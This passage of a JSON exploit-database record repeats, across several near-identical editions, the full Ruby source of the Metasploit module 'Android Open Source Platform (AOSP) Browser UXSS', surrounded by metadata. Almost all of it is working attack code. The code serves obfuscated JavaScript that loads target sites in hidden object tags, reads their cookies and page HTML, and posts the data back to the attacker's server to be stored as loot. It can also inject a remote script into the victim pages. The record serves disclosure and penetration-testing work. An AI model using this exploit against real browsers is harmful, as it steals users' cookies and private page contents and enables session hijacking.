UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T17:05:42", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T19:04:33", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T19:04:33", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T19:44:00", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T19:44:00", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T21:52:28", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T21:52:28", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T02:57:52", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T02:57:52", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T04:59:41", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T04:59:41", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 